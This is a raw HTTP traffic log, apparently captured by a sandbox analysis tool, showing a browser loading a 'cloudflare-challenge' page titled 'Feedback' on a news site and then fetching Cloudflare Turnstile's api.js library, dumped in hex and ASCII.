2024-11-18 16:55:45 UTC	700	OUT	GET /cloudflare-challenge/ HTTP/1.1 Host: timesofvartha.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-Dest: document Referer: https://sepedatua.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-18 16:55:45 UTC	208	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 16:55:45 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2024-11-18 16:55:45 UTC	1997	IN	Data Raw: 37 63 31 0d 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 65 65 64 62 61 63 6b 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 74 75 72 6e 73 74 69 6c 65 2f 76 30 2f 61 70 69 2e 6a 73 22 20 61 73 79 6e 63 20 64 Data Ascii: 7c1<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Feedback</title> <script src="https://challenges.cloudflare.com/turnstile/v0/api.js" async d

Timestamp	Bytes transferred	Direction	Data
2024-11-18 16:55:46 UTC	545	OUT	GET /turnstile/v0/api.js HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://timesofvartha.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-18 16:55:46 UTC	386	IN	HTTP/1.1 302 Found Date: Mon, 18 Nov 2024 16:55:46 GMT Content-Length: 0 Connection: close access-control-allow-origin: * cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=300, public cross-origin-resource-policy: cross-origin location: /turnstile/v0/b/22755d9a86c9/api.js Server: cloudflare CF-RAY: 8e497d73bc76359c-DFW alt-svc: h3=":443"; ma=86400

Timestamp	Bytes transferred	Direction	Data
2024-11-18 16:55:47 UTC	560	OUT	GET /turnstile/v0/b/22755d9a86c9/api.js HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://timesofvartha.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-18 16:55:47 UTC	471	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 16:55:47 GMT Content-Type: application/javascript; charset=UTF-8 Content-Length: 47672 Connection: close accept-ranges: bytes last-modified: Mon, 28 Oct 2024 19:08:47 GMT cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public access-control-allow-origin: * cross-origin-resource-policy: cross-origin Server: cloudflare CF-RAY: 8e497d79cc523ace-DFW alt-svc: h3=":443"; ma=86400
2024-11-18 16:55:47 UTC	898	IN	Data Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 6c 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 6c 5d 28 67 29 2c 75 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 66 29 7b 6e 28 66 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 75 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 75 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 42 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 6c 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74 Data Ascii: "use strict";(function(){function Ht(e,r,n,o,c,l,g){try{var h=e[l](g),u=h.value}catch(f){n(f);return}h.done?r(u):Promise.resolve(u).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var l=e.apply(r,n);funct
2024-11-18 16:55:47 UTC	1369	IN	Data Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 53 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75 Data Ascii: e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=nu
2024-11-18 16:55:47 UTC	1369	IN	Data Raw: 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 29 72 65 74 75 72 6e 20 61 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 6a 74 28 65 29 7c 7c 71 74 28 65 2c 72 29 7c 7c 47 74 28 65 2c 72 29 7c 7c 7a 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 44 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 55 65 28 65 2c 72 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 6c 5b 30 Data Ascii: ray$/.test(n))return at(e,r)}}function Ae(e,r){return jt(e)\|\|qt(e,r)\|\|Gt(e,r)\|\|zt()}function D(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(l[0
2024-11-18 16:55:47 UTC	1369	IN	Data Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 59 74 3d 33 30 30 30 32 30 3b 76 61 72 20 44 65 3d 33 30 30 30 33 30 3b 76 61 72 20 56 65 3d 33 30 30 30 33 31 3b 76 61 72 20 71 3b 28 66 75 Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Yt=300020;var De=300030;var Ve=300031;var q;(fu
2024-11-18 16:55:47 UTC	1369	IN	Data Raw: 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 24 7c 7c 28 24 3d 7b 7d 29 29 3b 76 61 72 20 69 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 Data Ascii: .NEVER="never",e.MANUAL="manual",e.AUTO="auto"})($\|\|($={}));var ie;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ie\|\|(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X\|\|(X={}));var
2024-11-18 16:55:47 UTC	1369	IN	Data Raw: 7d 66 75 6e 63 74 69 6f 6e 20 67 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 61 6c 77 61 79 73 22 2c 22 65 78 65 63 75 74 65 22 2c 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 51 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 74 72 75 65 22 2c 22 66 61 6c 73 65 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 79 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 72 65 6e 64 65 72 22 2c 22 65 78 65 63 75 74 65 22 5d 2c 65 29 7d 76 61 72 20 24 74 3d 33 30 30 2c 4a 74 3d 31 30 3b 66 75 6e 63 74 69 6f 6e 20 68 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 26 26 28 Data Ascii: }function gt(e){return M(["always","execute","interaction-only"],e)}function Qt(e){return M(["true","false"],e)}function yt(e){return M(["render","execute"],e)}var $t=300,Jt=10;function ht(e){var r=new URLSearchParams;if(e.params._debugSitekeyOverrides&&(
2024-11-18 16:55:47 UTC	1369	IN	Data Raw: 29 2e 63 6f 6e 63 61 74 28 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 72 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 74 68 65 6d 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 45 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 73 69 7a 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 6c 61 6e 67 75 61 67 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 66 29 7d 76 61 72 20 52 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 2c 6e 2c 6f 3d 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 57 69 64 74 68 3c 34 30 30 2c 63 3d 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 7c 7c 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 2c 6c 2c 67 3d 4d 28 6b 72 2c 28 6c 3d 28 72 3d 65 2e 64 Data Ascii: ).concat(e,"/").concat(r,"/").concat(n.theme,"/").concat(E,"/").concat(n.size,"/").concat(n.language,"/").concat(f)}var Rt=function(e){var r,n,o=window.innerWidth<400,c=e.state===Se.FAILURE_FEEDBACK\|\|e.state===Se.FAILURE_HAVING_TROUBLES,l,g=M(kr,(l=(r=e.d
2024-11-18 16:55:47 UTC	1369	IN	Data Raw: 73 68 61 6d 29 72 65 74 75 72 6e 21 31 3b 69 66 28 74 79 70 65 6f 66 20 50 72 6f 78 79 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 72 65 74 75 72 6e 21 30 3b 74 72 79 7b 72 65 74 75 72 6e 20 42 6f 6f 6c 65 61 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 76 61 6c 75 65 4f 66 2e 63 61 6c 6c 28 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 28 42 6f 6f 6c 65 61 6e 2c 5b 5d 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 29 29 2c 21 30 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 49 65 28 65 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 6a 65 28 29 3f 49 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 49 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 6c 2c 67 29 7b 76 61 72 20 68 3d 5b 6e 75 6c 6c 5d 3b 68 2e 70 75 73 68 2e 61 70 70 6c 79 Data Ascii: sham)return!1;if(typeof Proxy=="function")return!0;try{return Boolean.prototype.valueOf.call(Reflect.construct(Boolean,[],function(){})),!0}catch(e){return!1}}function Ie(e,r,n){return je()?Ie=Reflect.construct:Ie=function(c,l,g){var h=[null];h.push.apply
2024-11-18 16:55:47 UTC	1369	IN	Data Raw: 63 61 6c 6c 28 74 68 69 73 2c 6f 29 2c 4d 65 28 42 65 28 6c 29 2c 22 63 6f 64 65 22 2c 76 6f 69 64 20 30 29 2c 6c 2e 6e 61 6d 65 3d 22 54 75 72 6e 73 74 69 6c 65 45 72 72 6f 72 22 2c 6c 2e 63 6f 64 65 3d 63 2c 6c 7d 72 65 74 75 72 6e 20 6e 7d 28 71 65 28 45 72 72 6f 72 29 29 3b 66 75 6e 63 74 69 6f 6e 20 6d 28 65 2c 72 29 7b 76 61 72 20 6e 3d 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 2e 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 64 72 28 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 7a 65 28 65 29 7b 72 65 74 Data Ascii: call(this,o),Me(Be(l),"code",void 0),l.name="TurnstileError",l.code=c,l}return n}(qe(Error));function m(e,r){var n="[Cloudflare Turnstile] ".concat(e,".");throw new dr(n,r)}function b(e){console.warn("[Cloudflare Turnstile] ".concat(e))}function ze(e){ret
2024-11-18 16:55:47 UTC	1369	IN	Data Raw: 64 69 76 22 29 3b 75 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 22 66 69 78 65 64 22 2c 75 2e 73 74 79 6c 65 2e 7a 49 6e 64 65 78 3d 22 32 31 34 37 34 38 33 36 34 36 22 2c 75 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 75 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 2c 75 2e 73 74 79 6c 65 2e 74 6f 70 3d 22 30 22 2c 75 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 22 30 22 2c 75 2e 73 74 79 6c 65 2e 74 72 61 6e 73 66 6f 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 75 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 75 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 75 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 3d 22 72 67 62 61 28 30 Data Ascii: div");u.style.position="fixed",u.style.zIndex="2147483646",u.style.width="100vw",u.style.height="100vh",u.style.top="0",u.style.left="0",u.style.transformOrigin="center center",u.style.overflowX="hidden",u.style.overflowY="auto",u.style.background="rgba(0

Timestamp	Bytes transferred	Direction	Data
2024-11-18 16:55:48 UTC	383	OUT	GET /turnstile/v0/b/22755d9a86c9/api.js HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-18 16:55:48 UTC	471	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 16:55:48 GMT Content-Type: application/javascript; charset=UTF-8 Content-Length: 47672 Connection: close accept-ranges: bytes last-modified: Mon, 28 Oct 2024 19:08:47 GMT cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public access-control-allow-origin: * cross-origin-resource-policy: cross-origin Server: cloudflare CF-RAY: 8e497d80fad2a91e-DFW alt-svc: h3=":443"; ma=86400
2024-11-18 16:55:48 UTC	898	IN	Data Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 6c 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 6c 5d 28 67 29 2c 75 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 66 29 7b 6e 28 66 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 75 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 75 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 42 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 6c 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74 Data Ascii: "use strict";(function(){function Ht(e,r,n,o,c,l,g){try{var h=e[l](g),u=h.value}catch(f){n(f);return}h.done?r(u):Promise.resolve(u).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var l=e.apply(r,n);funct
2024-11-18 16:55:48 UTC	1369	IN	Data Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 53 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75 Data Ascii: e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=nu
2024-11-18 16:55:48 UTC	1369	IN	Data Raw: 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 29 72 65 74 75 72 6e 20 61 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 6a 74 28 65 29 7c 7c 71 74 28 65 2c 72 29 7c 7c 47 74 28 65 2c 72 29 7c 7c 7a 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 44 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 55 65 28 65 2c 72 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 6c 5b 30 Data Ascii: ray$/.test(n))return at(e,r)}}function Ae(e,r){return jt(e)\|\|qt(e,r)\|\|Gt(e,r)\|\|zt()}function D(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(l[0
2024-11-18 16:55:48 UTC	1369	IN	Data Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 59 74 3d 33 30 30 30 32 30 3b 76 61 72 20 44 65 3d 33 30 30 30 33 30 3b 76 61 72 20 56 65 3d 33 30 30 30 33 31 3b 76 61 72 20 71 3b 28 66 75 Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Yt=300020;var De=300030;var Ve=300031;var q;(fu
2024-11-18 16:55:48 UTC	1369	IN	Data Raw: 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 24 7c 7c 28 24 3d 7b 7d 29 29 3b 76 61 72 20 69 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 Data Ascii: .NEVER="never",e.MANUAL="manual",e.AUTO="auto"})($\|\|($={}));var ie;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ie\|\|(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X\|\|(X={}));var
2024-11-18 16:55:48 UTC	1369	IN	Data Raw: 7d 66 75 6e 63 74 69 6f 6e 20 67 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 61 6c 77 61 79 73 22 2c 22 65 78 65 63 75 74 65 22 2c 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 51 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 74 72 75 65 22 2c 22 66 61 6c 73 65 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 79 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 72 65 6e 64 65 72 22 2c 22 65 78 65 63 75 74 65 22 5d 2c 65 29 7d 76 61 72 20 24 74 3d 33 30 30 2c 4a 74 3d 31 30 3b 66 75 6e 63 74 69 6f 6e 20 68 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 26 26 28 Data Ascii: }function gt(e){return 